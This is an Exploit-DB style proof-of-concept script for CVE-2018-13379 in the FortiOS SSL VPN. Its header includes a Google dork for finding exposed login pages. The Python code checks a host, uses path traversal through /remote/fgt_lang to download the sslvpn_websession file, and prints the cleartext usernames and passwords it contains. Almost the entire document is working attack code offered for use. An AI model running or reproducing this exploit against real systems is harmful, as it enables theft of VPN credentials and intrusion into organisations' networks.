# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. # Google Dork: intext:"Please Login" inurl:"/remote/login" # Date: 17/08/2019 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://www.fortinet.com/ # Software Link: https://www.fortinet.com/products/fortigate/fortios.html # Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ). # Tested on: 5.6.6 # CVE : CVE-2018-13379 # Exploit SSLVPN Fortinet - FortiOs #!/usr/bin/env python import requests, sys, time import urllib3 urllib3.disable_warnings() def leak(host, port): print("[!] Leak information...") try: url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} r=requests.get(url, headers=headers, verify=False, stream=True) img=r.raw.read() if "var fgt_lang =" in str(img): with open("sslvpn_websession_"+host+".dat", 'w') as f: f.write(img) print("[>] Save to file ....") parse(host) print("\n") return True else: return False except requests.exceptions.ConnectionError: return False def is_character_printable(s): return all((ord(c) < 127) and (ord(c) >= 32) for c in s) def is_printable(byte): if is_character_printable(byte): return byte else: return '.' def read_bytes(host, chunksize=8192): print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat") with open("sslvpn_websession_"+host+".dat", "rb") as f: while True: chunk = f.read(chunksize) if chunk: for b in chunk: yield b else: break def parse(host): print("[!] Parsing Information...") memory_address = 0 ascii_string = "" for byte in read_bytes(host): ascii_string = ascii_string + is_printable(byte) if memory_address%61 == 60: if ascii_string!=".............................................................": print ascii_string ascii_string = "" memory_address = memory_address + 1 def check(host, port): print("[!] Check vuln...") uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" try: r = requests.get("https://" + host + ":" + port + uri, verify=False) if(r.status_code == 200): return True elif(r.status_code == 404): return False else: return False except: return False def main(host, port): print("[+] Start exploiting....") vuln = check(host, port) if(vuln): print("[+] Target is vulnerable!") bin_file = leak(host, port) else: print("[X] Target not vulnerable.") if __name__ == "__main__": if(len(sys.argv) < 3): print("Use: python {} ip/dns port".format(sys.argv[0])) else: host = sys.argv[1] port = sys.argv[2] main(host, port)